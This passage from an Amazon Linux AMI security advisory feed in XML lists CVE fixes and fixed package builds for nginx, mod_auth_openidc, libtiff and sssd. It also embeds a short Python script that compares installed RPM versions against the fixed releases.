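        y = sb[i] if i < len(sb) else None
        if x == "~" or y == "~":
            if x != "~":
                return 1
            if y != "~":
                return -1
            continue
        if x is None:  # a ran out of segments first: fewer segments is older
            return -1
        if y is None:
            return 1
        if x.isdigit() and y.isdigit():
            c = (int(x) > int(y)) - (int(x) < int(y))
        elif x.isdigit() != y.isdigit():
            c = 1 if x.isdigit() else -1  # a numeric segment is newer than an alpha one
        else:
            c = (x > y) - (x < y)
        if c:
            return c
    return 0


def evr_cmp(e1, v1, r1, e2, v2, r2):
    """Compare two (epoch, version, release) triples; epoch dominates, then version, then release."""
    c = (int(e1) > int(e2)) - (int(e1) < int(e2))
    return c or rpmvercmp(v1, v2) or rpmvercmp(r1, r2)


def parse_advisory(xml_text):
    """Extract id, severity, CVE ids and fixed package EVRs from every update element."""
    advisories = []
    for upd in ET.fromstring(xml_text).iter("update"):
        cves = [ref.get("id") for ref in upd.iter("reference") if ref.get("type") == "cve"]
        pkgs = [(p.get("name"), p.get("epoch", "0"), p.get("version"), p.get("release"), p.get("arch"))
                for p in upd.iter("package")]
        advisories.append({"id": upd.findtext("id"), "severity": upd.findtext("severity"),
                           "cves": cves, "packages": pkgs})
    return advisories


def parse_installed(text):
    """Map (name, arch) to (epoch, version, release) from rpm query output lines."""
    installed = {}
    for line in text.splitlines():
        name, epoch, version, release, arch = line.split()
        installed[(name, arch)] = ("0" if epoch == "(none)" else epoch, version, release)
    return installed


def missing_updates(advisories, installed):
    """List (advisory id, name, arch, installed EVR) for installed packages older than the fix.
    Packages the host does not have are skipped: the advisory does not apply to them."""
    missing = []
    for adv in advisories:
        for name, epoch, version, release, arch in adv["packages"]:
            current = installed.get((name, arch))
            if current is not None and evr_cmp(*current, epoch, version, release) < 0:
                missing.append((adv["id"], name, arch, "%s:%s-%s" % current))
    return missing


if __name__ == "__main__":
    for row in missing_updates(parse_advisory(SAMPLE_UPDATEINFO), parse_installed(INSTALLED)):
        print("%s: %s.%s installed at %s is below the fixed build" % row)
```
]]>
Comparing the full epoch:version-release rather than the version alone matters for this feed: most entries here fix a vulnerability by bumping only the release (2.4.amzn1 to 2.5.amzn1), and a naive string comparison would also misorder 1.10 against 1.9.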
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9511" title="" id="CVE-2019-9511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9513" title="" id="CVE-2019-9513" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.31.1" release="2.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.31.1-2.5.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.31.1-2.5.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.31.1-2.5.amzn1.i686.rpm</filename></package><package name="nghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.31.1-2.5.amzn1.i686.rpm</filename></package><package name="libnghttp2" version="1.31.1" release="2.5.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.31.1-2.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1299</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1299: important priority package update for nginx</title><issued 
date="2019-09-30 21:06:00" /><updated date="2019-10-02 22:58:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9516:
Some HTTP/2 implementations are vulnerable to a header leak, potentially leading to a denial of service. The attacker sends a stream of headers with a 0-length header name and 0-length header value, optionally Huffman encoded into 1-byte or greater headers. Some implementations allocate memory for these headers and keep the allocation alive until the session dies. This can consume excess memory.
1741864:
CVE-2019-9516 HTTP/2: 0-length headers lead to denial of service
CVE-2019-9513:
Some HTTP/2 implementations are vulnerable to resource loops, potentially leading to a denial of service. The attacker creates multiple request streams and continually shuffles the priority of the streams in a way that causes substantial churn to the priority tree. This can consume excess CPU.
1735741:
CVE-2019-9513 HTTP/2: flood using PRIORITY frames results in excessive resource consumption
CVE-2019-9511:
Some HTTP/2 implementations are vulnerable to window size manipulation and stream prioritization manipulation, potentially leading to a denial of service. The attacker requests a large amount of data from a specified resource over multiple streams. They manipulate window size and stream priority to force the server to queue the data in 1-byte chunks. Depending on how efficiently this data is queued, this can consume excess CPU, memory, or both.
1741860:
CVE-2019-9511 HTTP/2: large amount of data requests leads to denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9511" title="" id="CVE-2019-9511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9513" title="" id="CVE-2019-9513" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9516" title="" id="CVE-2019-9516" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nginx-mod-http-image-filter" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-image-filter-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-mail" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-mail-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-stream-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-debuginfo-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-perl" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-perl-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-geoip-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-all-modules" version="1.16.1" release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-all-modules-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.16.1" 
release="1.37.amzn1" epoch="1" arch="x86_64"><filename>Packages/nginx-mod-http-xslt-filter-1.16.1-1.37.amzn1.x86_64.rpm</filename></package><package name="nginx-mod-stream" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-stream-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-all-modules" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-all-modules-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-xslt-filter" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-xslt-filter-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-image-filter" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-image-filter-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-geoip" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-geoip-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-mail" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-mail-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-mod-http-perl" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-mod-http-perl-1.16.1-1.37.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.16.1" release="1.37.amzn1" epoch="1" arch="i686"><filename>Packages/nginx-debuginfo-1.16.1-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1300</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1300: medium priority 
package update for mod24_auth_openidc</title><issued date="2019-09-30 21:07:00" /><updated date="2019-10-02 22:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-6413:
It was found that mod_auth_openidc did not properly sanitize HTTP headers for certain request paths. A remote attacker could potentially use this flaw to bypass authentication and access sensitive information by sending crafted HTTP requests.
1428855:
CVE-2017-6413 mod_auth_openidc: OIDC_CLAIM and OIDCAuthNHeader not skipped in an "AuthType oauth20" configuration
CVE-2017-6059:
A text injection flaw was found in how mod_auth_openidc handled error pages. An attacker could potentially use this flaw to conduct content spoofing and phishing attacks by tricking users into opening specially crafted URLs.
1425350:
CVE-2017-6059 mod_auth_openidc: Shows user-supplied content on error pages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6059" title="" id="CVE-2017-6059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6413" title="" id="CVE-2017-6413" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-5.5.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc" version="1.8.8" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_auth_openidc-1.8.8-5.5.amzn1.x86_64.rpm</filename></package><package name="mod24_auth_openidc" version="1.8.8" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-1.8.8-5.5.amzn1.i686.rpm</filename></package><package name="mod24_auth_openidc-debuginfo" version="1.8.8" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_auth_openidc-debuginfo-1.8.8-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1306</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1306: medium priority package update for libtiff</title><issued date="2019-10-08 21:06:00" /><updated date="2019-10-09 23:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8905:
In LibTIFF 4.0.9, a heap-based buffer overflow occurs in the function LZWDecodeCompat in tif_lzw.c via a crafted TIFF file, as demonstrated by tiff2ps.
99999:
CVE-2018-8905 libtiff: heap-based buffer overflow in tif_lzw.c:LZWDecodeCompat() allows for denial of service
CVE-2018-7456:
A NULL Pointer Dereference occurs in the function TIFFPrintDirectory in tif_print.c in LibTIFF 4.0.9 when using the tiffinfo tool to print crafted TIFF information, a different vulnerability than CVE-2017-18013. (This affects an earlier part of the TIFFPrintDirectory function that was not addressed by the CVE-2017-18013 patch.)
99999:
CVE-2018-7456 libtiff: NULL pointer dereference in tif_print.c:TIFFPrintDirectory() causes a denial of service
CVE-2018-18661:
An issue was discovered in LibTIFF 4.0.9. There is a NULL pointer dereference in the function LZWDecode in the file tif_lzw.c.
99999:
CVE-2018-18661 libtiff: tiff2bw tool failed memory allocation leads to crash
CVE-2018-18557:
LibTIFF 4.0.9 (with JBIG enabled) decodes arbitrarily-sized JBIG into a buffer, ignoring the buffer size, which leads to a tif_jbig.c JBIGDecode out-of-bounds write.
99999:
CVE-2018-18557 libtiff: Out-of-bounds write in tif_jbig.c
CVE-2018-17101:
An issue was discovered in LibTIFF 4.0.9. There are two out-of-bounds writes in cpTags in tools/tiff2bw.c and tools/pal2rgb.c, which can cause a denial of service (application crash) or possibly have unspecified other impact via a crafted image file.
99999:
CVE-2018-17101 libtiff: Two out-of-bounds writes in cpTags in tools/tiff2bw.c and tools/pal2rgb.c
CVE-2018-17100:
An issue was discovered in LibTIFF 4.0.9. There is an int32 overflow in multiply_ms in tools/ppm2tiff.c, which can cause a denial of service (crash) or possibly have unspecified other impact via a crafted image file.
99999:
CVE-2018-17100 libtiff: Integer overflow in multiply_ms in tools/ppm2tiff.c
CVE-2018-12900:
Heap-based buffer overflow in the cpSeparateBufToContigBuf function in tiffcp.c in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (crash) or possibly have unspecified other impact via a crafted TIFF file.
99999:
CVE-2018-12900 libtiff: Heap-based buffer overflow in the cpSeparateBufToContigBuf function resulting in a denial of service or possibly code execution
CVE-2018-10963:
The TIFFWriteDirectorySec() function in tif_dirwrite.c in LibTIFF through 4.0.9 allows remote attackers to cause a denial of service (assertion failure and application crash) via a crafted file, a different vulnerability than CVE-2017-13726.
99999:
CVE-2018-10963 libtiff: reachable assertion in TIFFWriteDirectorySec function in tif_dirwrite.c
CVE-2018-10779:
An integer overflow has been discovered in libtiff in TIFFSetupStrips:tif_write.c, which could lead to a heap-based buffer overflow in TIFFWriteScanline:tif_write.c. An attacker may use this vulnerability to corrupt memory or cause Denial of Service.
99999:
CVE-2018-10779 libtiff: heap-based buffer over-read in TIFFWriteScanline function in tif_write.c
CVE-2016-3186:
Buffer overflow in the readextension function in gif2tiff.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (application crash) via a crafted GIF file.
99999:
CVE-2016-3186 libtiff: buffer overflow in gif2tiff
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3186" title="" id="CVE-2016-3186" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10779" title="" id="CVE-2018-10779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10963" title="" id="CVE-2018-10963" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12900" title="" id="CVE-2018-12900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17100" title="" id="CVE-2018-17100" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17101" title="" id="CVE-2018-17101" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18557" title="" id="CVE-2018-18557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18661" title="" id="CVE-2018-18661" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7456" title="" id="CVE-2018-7456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8905" title="" id="CVE-2018-8905" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="32.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="32.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="32.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="32.34.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-32.34.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-32.34.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-32.34.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-32.34.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="32.34.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-32.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1307</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1307: medium priority package update for sssd</title><issued date="2019-10-08 21:07:00" /><updated date="2019-10-09 23:12:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3811:
A vulnerability was found in sssd where, if a user was configured with no home directory set, sssd would return &#039;/&#039; (the root directory) instead of &#039;&#039; (the empty string / no home directory). This could impact services that restrict the user&#039;s filesystem access to within their home directory through chroot().
99999:
CVE-2019-3811 sssd: fallback_homedir returns &#039;/&#039; for empty home directories in passwd file
CVE-2018-16838:
A flaw was found in the sssd Group Policy Objects implementation. When the GPO is not readable by SSSD due to too strict permission settings on the server side, SSSD will allow all authenticated users to log in instead of denying access.
99999:
CVE-2018-16838 sssd: improper implementation of GPOs due to too restrictive permissions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16838" title="" id="CVE-2018-16838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3811" title="" id="CVE-2019-3811" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sssd-tools" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" 
version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" 
release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.4" release="21.25.amzn1" epoch="0" 
arch="noarch"><filename>Packages/python27-sssdconfig-1.16.4-21.25.amzn1.noarch.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.4-21.25.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_sudo-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-winbind-idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ldap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-common-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-dbus-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" 
arch="i686"><filename>Packages/libsss_certmap-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ad-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-1.16.4-21.25.amzn1.i686.rpm</filename></package><package 
name="sssd-client" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-proxy-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-debuginfo-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-devel-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libipa_hbac-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.25.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.16.4-21.25.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" 